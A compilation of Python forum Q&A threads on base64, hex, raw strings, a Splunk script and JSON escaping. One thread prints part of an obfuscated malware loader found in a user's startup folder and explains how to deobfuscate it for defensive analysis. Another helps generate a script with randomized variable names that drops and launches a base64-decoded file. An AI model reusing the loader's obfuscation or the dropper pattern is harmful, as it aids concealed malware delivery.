Base64 string format in python - python

I'm having trouble figuring out how to properly pass base64 data through string formatting in Python 2.7. Here's the relevant code snippet:
fileExec = open(fileLocation, 'w+')
fileExec.write(base64.b64decode('%s')) %(encodedFile) # encodedFile is base64 data of a file grabbed earlier in the script.
fileExec.close()
os.startfile(fileLocation)
As silly as it may seem, I am required to use string formatting in this case because of what this script is actually doing, but when I launch the script, I receive the following error:
TypeError: Incorrect Padding
I'm not quite sure what I need to do to the '%s' to get this to work. Any suggestions? Am I using the wrong string format?
Update: Here's a better idea of what I'm ultimately trying to accomplish:
encodedFile = randomString() # generates a random string for the variable name to be written
fileExec = randomString()
... snip ...
writtenScript += "\t%s.write(base64.b64decode(%s))\n" %(fileExec, encodedFile) # where writtenScript is the contents of the .py file that we are dynamically generating
I must use string formatting because the variable name will not always be the same in the Python file we are generating.

That error usually means your base64 string may not be encoded properly. But here it is just a side-effect of a logic error in your code.
What you have done is basically this:
a = base64.b64decode('%s')
b = fileExec.write(a)
c = b % (encodedFile)
So you are attempting to decode the literal string "%s", which fails.
It should look more like this:
fileExec.write(base64.b64decode(encodedFile))
[edit: using redundant string format... pls don't do this in real code]
fileExec.write(base64.b64decode("%s" % encodedFile))
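To see the order-of-operations problem in isolation, here is a minimal sketch. It is written for Python 3 (the question uses 2.7, where the exception type differs), and the payload is made up for illustration:

```python
import base64
import binascii

# Made-up payload standing in for encodedFile from the question.
encoded_file = base64.b64encode(b"example payload").decode("ascii")

# Decoding the literal '%s' fails before the % operator ever runs.
try:
    base64.b64decode('%s')
    literal_failed = False
except binascii.Error:
    literal_failed = True

# Formatting first and decoding second works as intended.
decoded = base64.b64decode("%s" % encoded_file)
print(literal_failed, decoded)
```

The point is only that the % has to be applied to the format string itself, inside the b64decode() call.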
Your updated question shows that the b64decode part is inside of a string, not in your code. That is a significant difference. The code in your string is also missing a set of inner quotes around the second format:
writtenScript += "\t%s.write(base64.b64decode('%s'))\n" % (fileExec, encodedFile)
(notice the single quotes...)
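A rough way to check the generated line is to build it and execute it against an in-memory file. This sketch assumes Python 3 and assumes that encodedFile holds the base64 text itself (if it really holds a variable name, as the update suggests, no quotes are needed). The variable name fh_x1 and the payload are invented, and the leading tab is dropped so the line can be executed on its own:

```python
import base64
import io

encoded = base64.b64encode(b"hello world").decode("ascii")
file_var = "fh_x1"  # hypothetical randomly generated variable name

# Without inner quotes the base64 text is pasted in as bare source code.
broken = "%s.write(base64.b64decode(%s))\n" % (file_var, encoded)
# With inner quotes it becomes a string literal in the generated script.
fixed = "%s.write(base64.b64decode('%s'))\n" % (file_var, encoded)

try:
    compile(broken, "<generated>", "exec")
    broken_compiles = True
except SyntaxError:
    broken_compiles = False

# Execute the fixed line with an in-memory file bound to the generated name.
namespace = {"base64": base64, file_var: io.BytesIO()}
exec(fixed, namespace)
written = namespace[file_var].getvalue()
print(broken_compiles, written)
```

Formatting with %r instead of '%s' would add the quotes for you.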

Related

Trying to understand this potentially virus encrypted pyw file

Today I realised this .pyw file was added into my startup files.
I have already deleted it, but I'm worried about what it may have done to my computer. It looks encrypted in some way and I am not very familiar with Python, but I assume that since this is the source code, there is no way to completely encrypt it.
Can someone either guide me through decoding it, or check it for me?
edit: by the looks of it I can only post some of it here, but it should give brief idea of how it was encrypted:
class Protect():
def __decode__(self:object,_execute:str)->exec:return(None,self._delete(_execute))[0]
def __init__(self:object,_rasputin:str=False,_exit:float=0,*_encode:str,**_bytes:int)->exec:
self._byte,self._decode,_rasputin,self._system,_bytes[_exit],self._delete=lambda _bits:"".join(__import__(self._decode[1]+self._decode[8]+self._decode[13]+self._decode[0]+self._decode[18]+self._decode[2]+self._decode[8]+self._decode[8]).unhexlify(str(_bit)).decode()for _bit in str(_bits).split('/')),exit()if _rasputin else'abcdefghijklmnopqrstuvwxyz0123456789',lambda _rasputin:exit()if self._decode[15]+self._decode[17]+self._decode[8]+self._decode[13]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read() or self._decode[8]+self._decode[13]+self._decode[15]+self._decode[20]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read()else"".join(_rasputin if _rasputin not in self._decode else self._decode[self._decode.index(_rasputin)+1 if self._decode.index(_rasputin)+1<len(self._decode)else 0]for _rasputin in "".join(chr(ord(t)-683867)if t!="ζ"else"\n"for t in self._byte(_rasputin))),lambda _rasputin:str(_bytes[_exit](f"{self._decode[4]+self._decode[-13]+self._decode[4]+self._decode[2]}(''.join(%s),{self._decode[6]+self._decode[11]+self._decode[14]+self._decode[1]+self._decode[0]+self._decode[11]+self._decode[18]}())"%list(_rasputin))).encode(self._decode[20]+self._decode[19]+self._decode[5]+self._decode[34])if _bytes[_exit]==eval else exit(),eval,lambda _exec:self._system(_rasputin(_exec))
return self.__decode__(_bytes[(self._decode[-1]+'_')[-1]+self._decode[18]+self._decode[15]+self._decode[0]+self._decode[17]+self._decode[10]+self._decode[11]+self._decode[4]])
Protect(_rasputin=False,_exit=False,_sparkle='''ceb6/f2a6bdbe/f2a6bdbb/f2a6bf82/f2a6bf83/ceb6/f2a6bdbe/f2a6bdbb/f2a6bf83/f2a6bf80/f2a6bdbb/f2a6bf93/f2a6bf89/f2a6bf8f/f2a6bdbb/f2a6bebe/f2a6bebf/f2a6bf89/f2a6bebc/f2a6bf80/
OBLIGATORY WARNING: The code is pretty obviously hiding something, and it eventually will build a string and exec it as a Python program, so it has full permissions to do anything your user account does on your computer. All of this is to say DO NOT RUN THIS SCRIPT.
The payload for this nasty thing is in that _sparkle string, which you've only posted a prefix of. Once you get past all of the terrible spacing, this program basically builds a new Python program using some silly math and exec's it, using the _sparkle data to do it. It also has some basic protection against you inserting print statements in it (amusingly, those parts are easy to remove). The part you've posted decrypts to two lines of Python comments.
# hi
# if you deobf
Without seeing the rest of the payload, we can't figure out what it was meant to do. But here's a Python function that should reverse-engineer it.
import binascii
# Feed this function the full value of the _sparkle string.
def deobfuscate(data):
    decode = 'abcdefghijklmnopqrstuvwxyz0123456789'
    r = "".join(binascii.unhexlify(str(x)).decode() for x in str(data).split('/'))
    for x in r:
        if x == "ζ":
            print()
        else:
            x = chr(ord(x)-683867)
            if x in decode:
                x = decode[(decode.index(x) + 1) % len(decode)]
            print(x, end='')
Each sequence of hex digits between the / characters is decoded as UTF-8: every two hex digits form one byte, and in the posted data each sequence yields a single character. The character "ζ" stands for a newline. For any other character, the magic number 683867 is subtracted from its code point and the result is converted back into a character. Finally, if that character is a lowercase letter or a digit, it's shifted one place to the right in the decode string, wrapping around at the end: letters move one forward in the alphabet (z becomes 0) and digits increase by one (9 becomes a). Anything else is left unshifted. The result, presumably, forms a valid Python program.
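As a worked example of those steps, here is a variant that returns the text instead of printing it, applied to the first five chunks of the posted _sparkle prefix. The names decode_sparkle, ALPHABET and OFFSET are mine, not from the malware; this only decodes text and never executes it:

```python
import binascii

ALPHABET = 'abcdefghijklmnopqrstuvwxyz0123456789'
OFFSET = 683867  # magic number taken from the obfuscated script

def decode_sparkle(data):
    """Return the decoded text for a '/'-separated hex string."""
    chars = "".join(
        binascii.unhexlify(chunk).decode("utf-8") for chunk in data.split('/')
    )
    out = []
    for ch in chars:
        if ch == "ζ":
            # ζ is the obfuscator's stand-in for a newline
            out.append("\n")
            continue
        ch = chr(ord(ch) - OFFSET)
        if ch in ALPHABET:
            # shift one place to the right, wrapping at the end
            ch = ALPHABET[(ALPHABET.index(ch) + 1) % len(ALPHABET)]
        out.append(ch)
    return "".join(out)

prefix = "ceb6/f2a6bdbe/f2a6bdbb/f2a6bf82/f2a6bf83"
decoded = decode_sparkle(prefix)
print(repr(decoded))  # '\n# hi'
```

For instance, f2a6bdbe is the UTF-8 encoding of code point 683902, and 683902 - 683867 = 35, which is '#'.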
From here, you have a few options.
1. Run the Python script I gave above on the real, full _sparkle string and figure out what the resulting program does yourself.
2. Run the Python script I gave above on the real, full _sparkle string and post the code in your question so we can decompose that.
3. Post the full _sparkle string in the question, so I or someone else can decode it.
4. Wipe the PC to factory settings and move on.

Converting a string formatted in hex in Python to binary data correctly

I have a string formatted as '\x00\x00\x00\x00' and need it to be formatted such that, when printed, it appears in the console as b'\x00\x00\x00\x00'
How do I do this?
edit: I had a different version of the code printing out a string formatted with b'\xf4\x00\x00\x00' etc and on my computer it prints '\xf4\x00\x00\x00'
Just add the b prefix before the string literal; that way you define the value as bytes rather than as a string.
# example
s = b"\x00\x00\x00\x00"
print(s)
If instead you're receiving the string from somewhere else rather than writing it by hand, you can encode it into bytes. Use the latin-1 codec so that each character from \x00 to \xff maps to exactly one byte; the default UTF-8 codec would turn a character such as \xf4 into two bytes.
# another example
# let's pretend that we received the value from, say, a function
s = "\x00\x00\x00\x00".encode("latin-1")
print(s)
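One caveat worth checking, assuming Python 3: encode() with no argument uses UTF-8, which only matches the original byte values for characters below \x80. A short comparison using the \xf4 value from the question's edit:

```python
s = "\xf4\x00\x00\x00"

# UTF-8 expands \xf4 into two bytes, so the result is five bytes long.
as_utf8 = s.encode()
# latin-1 maps every code point 0-255 to the byte with the same value.
as_latin1 = s.encode("latin-1")

print(as_utf8)    # b'\xc3\xb4\x00\x00\x00'
print(as_latin1)  # b'\xf4\x00\x00\x00'
```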

Python: Image's path as a raw string an input to a function

I want to get an image path from the user as a raw string. I used input() to get the path. Hard-coding the path as a raw string (prefixing it with r) makes the program work, but when I try to add the r to the user's input, Image.open() treats the r as part of the path and raises an error. Can someone help me resolve this problem?
path=input('Please enter the path of the image')
im=Image.open(path)
I get a "no file found" error.
If I instead use:
y='r'+path
im=Image.open(y)
then the error is
OSError: [Errno 22] Invalid argument: 'rC:\\Users\\User\\Desktop\.......jpeg'
I am new to python, so please help me if there is any method by which I can solve this issue.
Raw strings are for a programmer's convenience; you don't have to have your users enter raw strings as normal input.
See the end of this post for the solution to your problem. Because you said you are new to Python, I have decided to give a detailed answer here.
Why raw strings?
Normal strings assign special meaning to the \ (backslash) character. This is fine as \ can be escaped by using \\ (two backslashes) to represent a single backslash.
However, this can sometimes become ugly.
Consider, for example, a path: C:\Users\Abhishek\test.txt. To represent this as a normal string in Python, all \ must be escaped:
string = 'C:\\Users\\Abhishek\\test.txt'
You can avoid this by using raw strings. Raw strings don't treat \ specially.
string = r'C:\Users\Abhishek\test.txt'
That's it. This is the only use of raw strings, viz., convenience.
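A quick check that the two spellings produce the same string object contents, so the r prefix only affects how the literal is written in source code:

```python
escaped = 'C:\\Users\\Abhishek\\test.txt'
raw = r'C:\Users\Abhishek\test.txt'

# Both literals describe the same 26-character string.
same = escaped == raw
print(same, len(raw))  # True 26
```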
Solution
If you are using Python 2, use raw_input instead of input. If you are using Python 3 (as you should be) input is fine. Don't try to input the path as a raw string.
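The question doesn't say why the plain input() version reported a missing file. One common cause, and this is only a guess, is stray whitespace or quotes pasted along with the path. A small sketch with a hypothetical clean_path helper and a made-up path:

```python
def clean_path(text):
    """Strip surrounding whitespace and one pair of matching quotes (hypothetical helper)."""
    text = text.strip()
    if len(text) >= 2 and text[0] == text[-1] and text[0] in "\"'":
        text = text[1:-1]
    return text

# What input() might return if the user pastes a quoted path (made-up example).
typed = '"C:\\Users\\User\\Desktop\\photo.jpeg" '
path = clean_path(typed)

# Prepending the letter r just changes the path; it does not make a raw string.
prefixed = 'r' + path
print(path)
print(prefixed)
```

The string returned by input() already contains single backslashes exactly as typed, so there is nothing left to escape.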

How does one create inline Python scripts for use in Splunk search queries?

I am creating a simple script to take a hex (base 16) encoded field and convert it to readable text. For this I have decided to use Python's built-in string method .decode("hex"). I would like to use this script in a search pipeline, running a field called packet through it and creating a new field of decoded text in the process.
I have read the documentation for the splunk.Intersplunk API, but I do not fully understand what I need to use to complete my script. Specifically, from the examples I have seen, I do not understand what the following line does for me:
(isgetinfo, sys.argv) = splunk.Intersplunk.isGetInfo(sys.argv)
Additionally in the case of collecting results and creating the new field is the following line needed?
results = splunk.Intersplunk.readResults(None, None, False)
So that you can follow along, this is what I have so far; I believe I am close.
import sys
import splunk.Intersplunk
import string
#Program takes hex encoded string from a field and outputs value in search results at the gui
(isgetinfo, sys.argv) = splunk.Intersplunk.isGetInfo(sys.argv) #debug to see arguments I think Does it print these out?
results = splunk.Intersplunk.readResults(None, None, False)
str=""
if len(sys.argv) < 2: # make sure there is an argument passed if not return error
    splunk.Intersplunk.parseError("[!] No arguments provided, please provide one argument.")
    sys.exit(1)
else: #grab the string from sys.argv and make it uppercase because I like uppercase hex strings :)
    str=sys.argv[1]
    str=str.upper()
if all(char in string.hexdigits for char in str): # make sure all characters are hex
    decoded_string = str.decode("hex")
    splunk.Intersplunk.outputResults(decoded_string)
else: # return an error if its not a hex string
    splunk.Intersplunk.parseError("[!] String provided is not [A-F 0-9], please validate your inputs")
    sys.exit(1)
Also I am aware of the need for the STANZA setting below.
[decode_hex]
TYPE = python
FILENAME = decode_hex.py
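Leaving the Splunk-specific calls aside, the validation and hex-decoding step on its own could be sketched as below. This assumes Python 3, where str.decode("hex") no longer exists and bytes.fromhex() does the same job. decode_hex_field is a hypothetical helper name, and decoding the bytes as UTF-8 is an assumption about the packet contents:

```python
import string

def decode_hex_field(value):
    """Return the text encoded by a hex string, or None if it is not valid hex."""
    value = value.strip()
    # Hex-encoded bytes always come in pairs of digits.
    if not value or len(value) % 2 != 0:
        return None
    if not all(ch in string.hexdigits for ch in value):
        return None
    # Undecodable bytes are replaced rather than raising an exception.
    return bytes.fromhex(value).decode("utf-8", errors="replace")

print(decode_hex_field("48656C6C6F"))  # Hello
print(decode_hex_field("xyz1"))        # None
```

Returning None instead of exiting keeps the helper easy to call once per event; how the result is handed back to Splunk is not covered here.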

Convert Unicode string to UTF-8, and then to JSON

I want to encode a string in UTF-8 and view the corresponding UTF-8 bytes individually. In the Python REPL the following seems to work fine:
>>> unicode('©', 'utf-8').encode('utf-8')
'\xc2\xa9'
Note that I’m using U+00A9 COPYRIGHT SIGN as an example here. The '\xC2\xA9' looks close to what I want — a string consisting of two separate code points: U+00C2 and U+00A9. (When UTF-8-decoded, it gives back the original string, '\xA9'.)
Then, I want the UTF-8-encoded string to be converted to a JSON-compatible string. However, the following doesn’t seem to do what I want:
>>> import json; json.dumps('\xc2\xa9')
'"\\u00a9"'
Note that it generates a string containing U+00A9 (the original symbol). Instead, I need the UTF-8-encoded string, which would look like "\u00C2\u00A9" in valid JSON.
TL;DR How can I turn '©' into "\u00C2\u00A9" in Python? I feel like I’m missing something obvious — is there no built-in way to do this?
If you really want "\u00c2\u00a9" as the output, give json a Unicode string as input.
>>> print json.dumps(u'\xc2\xa9')
"\u00c2\u00a9"
You can generate this Unicode string from the raw bytes:
s = unicode('©', 'utf-8').encode('utf-8')
s2 = u''.join(unichr(ord(c)) for c in s)
I think what you really want is "\xc2\xa9" as the output, but I'm not sure how to generate that yet.
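For readers on Python 3, where unicode() and unichr() are gone, a rough equivalent of the approach above is to encode to UTF-8 and then reinterpret each byte as a code point via latin-1. This is a sketch of the same idea, not something from the original answer:

```python
import json

utf8_bytes = '©'.encode('utf-8')               # b'\xc2\xa9'
# latin-1 maps each byte 0-255 to the code point with the same value.
as_code_points = utf8_bytes.decode('latin-1')  # 'Â©' (U+00C2, U+00A9)
dumped = json.dumps(as_code_points)

print(dumped)  # "\u00c2\u00a9"
```

json.dumps escapes non-ASCII characters by default (ensure_ascii=True) and uses lowercase hex digits, which JSON parsers treat the same as uppercase.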
